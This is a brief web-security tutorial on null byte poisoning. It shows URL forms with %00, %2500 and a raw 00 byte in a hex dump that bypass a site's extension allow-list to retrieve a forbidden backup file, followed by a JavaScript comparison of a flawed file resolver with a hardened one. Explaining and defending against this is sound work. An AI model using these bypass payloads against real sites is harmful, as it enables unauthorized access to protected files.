Null Byte Poisoning
Null byte poisoning is used to bypass input filtering or validation mechanisms in web applications or other systems. It involves inserting a null byte, either URL-encoded (%00) or in hexadecimal (\x00), to terminate strings.
We request a resource from a site, but it returns a 403 error (Forbidden). The site tells us that only certain file types or extensions may be requested:
http://$url/package.json.bak
We can bypass the check by inserting a null byte followed by an extension the site allows. The validation passes because the string ends in an allowed extension, but internally, when the file is looked up, the null byte terminates the string, so the desired file is returned:
http://$url/package.json.bak%00.$extension
If that doesn't work, we can also URL-encode the % itself, which is represented as %25:
http://$url/package.json.bak%2500.$extension
It is also possible to get this result by editing the hex data of the request and inserting a null byte (00) at the corresponding position:
00000000 68 74 74 70 3A 2F 2F 24 75 72 6C 2F 70 61 63 6B http://$url/pack
00000010 61 67 65 2E 6A 73 6F 6E 2E 62 61 6B 00 2E 24 65 age.json.bak..$e
00000020 78 74 65 6E 73 69 6F 6E 0A xtension.
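The mismatch described above, between the string the extension check sees and the string the file lookup uses, shown next to a hardened check. This is an added example, not code from the original page; the function names, the allow-list (.md, .pdf) and the second decode in the lower layer are assumptions made for illustration.

```javascript
// Added example; function names and the allow-list are hypothetical.
const ALLOWED = ['.md', '.pdf'];

// Models a lower layer that handles the name as a C string: it stops at the first NUL.
function cStringView(name) {
  const i = name.indexOf('\0');
  return i === -1 ? name : name.slice(0, i);
}

// Flawed pattern: the extension is checked on one string, the lookup uses another.
function naiveResolve(raw) {
  const name = decodeURIComponent(raw);            // decode done by the framework
  if (!ALLOWED.some((ext) => name.endsWith(ext))) return { status: 403 };
  const again = decodeURIComponent(name);          // second decode further down
  return { status: 200, file: cStringView(again) };
}

// Hardened: decode once, refuse control bytes and leftover escapes,
// then check and look up the very same string.
function hardenedResolve(raw) {
  let name;
  try {
    name = decodeURIComponent(raw);
  } catch (e) {
    return { status: 400 };                        // malformed percent-encoding
  }
  if (/[\x00-\x1f\x7f]/.test(name)) return { status: 400 };  // NUL and other control bytes
  if (/%[0-9a-f]{2}/i.test(name)) return { status: 400 };    // still encoded after one decode
  if (!ALLOWED.some((ext) => name.endsWith(ext))) return { status: 403 };
  return { status: 200, file: name };
}

// Constructed sample requests, mirroring the URL forms above with $extension = md.
const samples = ['readme.md', 'package.json.bak', 'package.json.bak%00.md', 'package.json.bak%2500.md'];
for (const s of samples) {
  console.log(s, JSON.stringify(naiveResolve(s)), JSON.stringify(hardenedResolve(s)));
}
```

The hardened version returns 400 for both encoded forms because it never lets the validated string and the looked-up string diverge.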